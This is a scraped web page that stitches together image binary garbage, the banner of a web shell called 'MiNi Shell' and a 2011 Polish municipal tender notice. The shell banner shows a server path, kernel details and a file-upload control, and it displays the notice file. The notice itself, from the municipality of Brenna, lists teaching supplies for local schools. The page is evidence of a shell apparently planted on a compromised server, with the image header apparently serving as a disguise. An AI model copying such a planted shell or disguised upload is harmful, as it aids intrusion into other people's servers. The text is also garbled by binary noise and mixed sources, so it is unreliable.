JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110114/18371-N-2011.html

<p class="kh_header"><b>Brenna: Dostawa materiałów dydaktycznych na zajęcia realizowane w ramach projektu Nasze dzieci- nasza przyszłość współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 18371 - 2011; data zamieszczenia: 14.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brenna , ul. Wyzwolenia 77, 43-438 Brenna, woj. śląskie, tel. 033 8536222, faks 033 8536370.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brenna.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów dydaktycznych na zajęcia realizowane w ramach projektu Nasze dzieci- nasza przyszłość współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy dostawy materiałów dydaktycznych na zajęcia realizowane w ramach projektu Nasze dzieci- nasza przyszłość współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, wg zadań jak niżej :

Nr  zadania	Nazwa zadania	Ilość pozycji wg. asortymentu w poszczególnych zadaniach
Zadanie 1	Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć dydaktyczno-wyrównawczych i specjalistycznych w SP 	7 poz.
Zadanie 2	Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć ukierunkowanych na kompetencje kluczowe w SP1	6 poz.
Zadanie 3	Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć dydaktyczno-wyrównawczych i specjalistycznych w  SP2 	11 poz.
Zadanie 4	Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć ukierunkowanych na kompetencje kluczowe w SP2	10 poz.
Zadanie 5	Dostawa materiałów dydaktycznych niezbędne do realizacji wsparcia pedagogiczno-psychologicznego w SP2	4 poz.
Zadanie 6	Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć ukierunkowanych na kompetencje kluczowe w  Gimnazjum	17 poz.
Zadanie 7	Dostawa materiałów dydaktycznych niezbędne do realizacji wsparcia pedagogiczno psychologicznego w Gimnazjum,	5 poz.
Zadanie 8	Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć dydaktyczno-wyrównawczych i specjalistycznych w  ZSP	14 poz.
Zadanie 9	Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć ukierunkowanych na kompetencje kluczowe w ZSP 	39 poz.
Zadanie 10	Dostawa materiałów dydaktycznych niezbędne do realizacji wsparcia pedagogiczno-psychologicznego w ZSP 	3 poz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.20.00-5, 30.19.00.00-7, 48.19.00.00-6, 37.31.00.00-4, 22.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/ Formularz oferty według załączonego wzoru wraz z załącznikiem(załącznik nr 1) oraz wykazem cenowym materiałów załącznik nr 8. 2/ Oświadczenie, o którym mowa w art. 22 ust. 1 ustawy p.z.p. (załącznik nr 2). 3/ Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia o którym mowa w art. 24 ust.1 i 2, Prawa zamówień publicznych, wg wzoru stanowiącego Załącznik Nr 3 do SIWZ. Wykaz Podwykonawców oraz zgodę Podwykonawców na wykonanie określonej części zamówienia - jeżeli dotyczy ( załącznik nr 7 )</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Działając zgodnie z Art.144 ust 1 Ustawy Prawo Zamówień Publicznych Zamawiający dopuszcza możliwość zmiany treści umowy w stosunku do oferty w szczególności w przypadkach: 1.1. Zmian ogólnych: - zmiany będące skutkiem poprawy oczywistej pomyłki pisarskiej bądź rachunkowej. - zmiany stanu prawnego mające wpływ na realizację przedmiotu zamówienia. 1.2. Zmian wpływających na wynagrodzenie - możliwa jest zmiana postanowień umowy w związku ze zmiana stawki podatku od towarów i usług (VAT) - z obniżeniem kosztu wykonania usług a tym samym wynagrodzenia Wykonawcy (na korzyść Zamawiającego) wynikająca z przyczyn technicznych, technologicznych, organizacyjnych, których przed zawarciem umowy nie można było przewidzieć. 1.3. Innych zmian - z zastrzeżeniem art. 140 ust.3 ustawy Prawo zamówień publicznych 2. Zmiana umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej. 3. Zamawiający zastrzega sobie prawo odstąpienia od umowy w przypadkach wskazanych w umowie i ustawie oraz gdy: a) zostanie ogłoszona likwidacja lub upadłości Wykonawcy, b) Wykonawca nie rozpoczął realizacji umowy w terminie, c) Wykonawca dopuścił się rażącego naruszenia innych istotnych postanowień umowy, d) Wykonawca przerwał realizację dowozu z przyczyn leżących po jego stronie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.brenna.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Brennej ul. Wyzwolenia 77 43-438 Brenna pok. 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2011 godzina 10:30, miejsce: Urząd Gminy w Brennej ul. Wyzwolenia 77 43-438 Brenna pok. 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu Nasze dzieci- nasza przyszłość współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć dydaktyczno-wyrównawczych i specjalistycznych w SP 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup gier edukacyjnych (domino obrazkowo-wyrazowe i obrazkowe) na zajęcia z logopedii	sztuki	3
Zakup kart Rozwijamy mowę i myślenie dziecka na zajęcia z logopedii	sztuki	16
Zakup wibratora logopedycznego na zajęcia z logopedii	sztuki	1
Zakup środków higienicznych i do dezynfekcji	komplet	1
Zakup kompletów zeszytów ćwiczeń dla 5 uczniów na zajęcia dla dyslektyków i osób mających problemy z ortografią	sztuki	10
Zakup papieru ksero	ryz	30
Zakup teczek dla uczniów	sztuki	75.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.20.00-5, 30.19.00.00-7, 48.19.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć ukierunkowanych na kompetencje kluczowe w SP1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup kompletu dekoracji na zajęcia teatralne	komplet	1
Zakup śpiewników regionalnych na zajęcia zespołu regionalnego	sztuki	20
Zakup instrumentów na zajęcia z zespołu regionalnego (skrzypce, klarnet)	sztuki	2
Zakup materiałów papierniczych i pasmanteryjnych na zajęcia artystyczne dla 20 uczniów	osoby	20
Zakup programu komputerowego na zajęcia informatyczne	sztuki	1
Zakup papieru ksero	ryz	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 37.31.00.00-4, 30.19.00.00-7, 48.19.00.00-6, 22.11.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć dydaktyczno-wyrównawczych i specjalistycznych w  SP2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup zeszytów ćwiczeń na zajęcia z j. polskiego	sztuki	15
Zakup planszy gramatycznych na zajęcia z j. angielskiego	sztuki	18
Zakup the memory game na zajęcia z j. angielskiego	sztuki	5
Zakup multimedialnego pakietu logopedycznego na zajęcia z logopedii	sztuki	2
Zakup gier edukacyjnych (domino obrazkowo-wyrazowe i obrazkowe) na zajęcia z logopedii	sztuki	3
Zakup kart Rozwijamy mowę i myślenie dziecka na zajęcia z logopedii	sztuki	16
Zakup wibratora logopedycznego na zajęcia z logopedii	sztuki	1
Zakup środków higienicznych i do dezynfekcji	komplet	1
Zakup książek na zajęcia z logopedii	sztuki	10
Zakup papieru ksero	ryz	30
Zakup kredy kolorowej	opakowanie	14.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.20.00-5, 30.19.00.00-7, 22.11.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć ukierunkowanych na kompetencje kluczowe w SP2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup programu multimedialnego Królik Bystrzak na zajęcia informatyczne	sztuki	3
Zakup bloków rysunkowych na zajęcia literackie	sztuki	10
Zakup brystolu na zajęcia literackie	sztuki	20
Zakup bibuły kolorowej na zajęcia literackie	sztuki	100
Zakup map na zajęcia dla miłośników kultury amerykańskiej i brytyjskiej	sztuki	5
Zakup podręczników na zajęcia dla miłośników kultury amerykańskiej i brytyjskiej	sztuki	6
Zakup materiałów papierniczych na zajęcia plastyczne dla 30 uczniów	osoby	30
Zakup materiałów papierniczych i pasmanteryjnych na zajęcia z robótek ręcznych dla 12 uczniów	osoby	12
Zakup dzwonków chromatycznych na zajęcia instrumentalne	sztuki	10
Zakup papieru ksero	ryza	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 37.31.00.00-4, 30.19.00.00-7, 48.19.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa materiałów dydaktycznych niezbędne do realizacji wsparcia pedagogiczno-psychologicznego w SP2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup brystolu	sztuki	20
Zakup bibuły kolorowej	sztuki	40
Zakup mazaków	opakowanie	9
Zakup papieru ksero	ryza	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć ukierunkowanych na kompetencje kluczowe w  Gimnazjum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup map konturowych na zajęcia geograficzne	sztuki	15
Zakup kompasów na zajęcia geograficzne	sztuki	12
Zakup tablic geograficznych na zajęcia geograficzne	sztuki	15
Zakup kalkulatorów na zajęcia matematyczne	sztuki	20
Zakup tablic matematycznych na zajęcia matematyczne	sztuki	10
Zakup palnika z butlą gazową na zajęcia fizyczno-chemiczne	sztuki	1
Zakup butelki lejdejskiej na zajęcia fizyczno-chemiczne	sztuki	2
Zakup mierników uniwersalnych na zajęcia fizyczno-chemiczne	sztuki	5
Zakup folii do rzutnika na zajęcia z j. angielskiego	opakowania	3
Zakup Repetytorium na zajęcia z j. angielskiego	sztuki	30
Zakup zestawu do decoupage na zajęcia plastyczne dla 7 uczniów	osoby	7
Zakup sztalug na zajęcia plastyczne	sztuki	5
Zakup materiałów papierniczych na zajęcia plastyczne dla 7 uczniów	osoby	7
Zakup kompletu dekoracji na zajęcia teatralne	komplet	1
Zakup sprzętu nagłaśniającego na zajęcia teatralne	sztuki	10
Zakup reflektorów na zajęcia teatralne	sztuki	2
Zakup papieru ksero	ryza	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa materiałów dydaktycznych niezbędne do realizacji wsparcia pedagogiczno psychologicznego w Gimnazjum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup papieru pakowego	sztuki	50
Zakup bloków rysunkowych	sztuki	20
Zakup mazaków	opakowanie	10
Zakup materacyków	sztuki	15
Zakup płyt z muzyką relaksacyjną	zestaw	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć dydaktyczno-wyrównawczych i specjalistycznych w  ZSP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup książek na zajęcia etnologiczne	sztuki	32
Zakup kaset, płyt CD i filmów na zajęcia etnologiczne	sztuki	12
Zakup materiałow pasmanteryjnych na zajęcia etnologiczne dla 15 uczniów	sztuki	15
Zakup śpiewników na zajęcia etnologiczne	sztuki	15
Zakup materiałów papierniczych na zajęcia etnologiczne	zestaw	15
Zakup map ściennych na zajęcia przyrodnicze	sztuki	5
Zakup plansz poglądowych na zajęcia przyrodnicze	zestaw	1
Zakup anaglifów z okularami 3D na zajęcia z matematyki	sztuki	42
Zakup zbiorów zadań na zajęcia z matematyki	sztuki	42
Zakup kalkulatorów na zajęcia z matematyki	sztuki	8
Zakup słowników na zajęcia z j. polskiego	sztuki	9
Zakup ćwiczeń na zajęcia wyrównawcze	sztuki	12
Zakup kolorowych kartonów	sztuki	10
Zakup papieru ksero	ryza	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 22.11.00.00-4, 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa materiałów dydaktycznych niezbędne do realizacji zajęć ukierunkowanych na kompetencje kluczowe w ZSP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup słowników i encyklopedii na zajęcia z j. polskiego	sztuki	25
Zakup bibuły kolorowej na zajęcia z j. polskiego	sztuki	75
Zakup słownika multimedialnego na zajęcia z j. angielskiego	sztuki	1
Zakup programu multimedialnego Profesor Henry na zajęcia z j. angielskiego	sztuki	3
Zakup kartonów na zajęcia teatralne	sztuki	10
Zakup tektury na zajęcia teatralne	sztuki	10
Zakup farb na zajęcia teatralne	sztuki	10
Zakup papieru kolorowego na zajęcia teatralne	sztuki	10
Zakup książek na zajęcia biologiczne	sztuki	10
Zakup atlasu anatomii na zajęcia biologiczne	sztuki	6
Zakup modelu szkieletu człowieka na zajęcia biologiczne	sztuki	1
Zakup modeli układów i narządów wewnętrznych na zajęci biologiczne	sztuki	5
Zakup gry szachy na zajęcia szachowe	sztuki	5
Zakup zegarów szachowych na zajęcia szachowe	sztuki	5
Zakup materiałów papierniczych na zajęcia redakcyjne dla 8 uczniów	osoby	8
Zakup materiałów papierniczych i pasmanteryjnych na zajęcia plastyczno-techniczne dla 7 uczniów	osoby	7
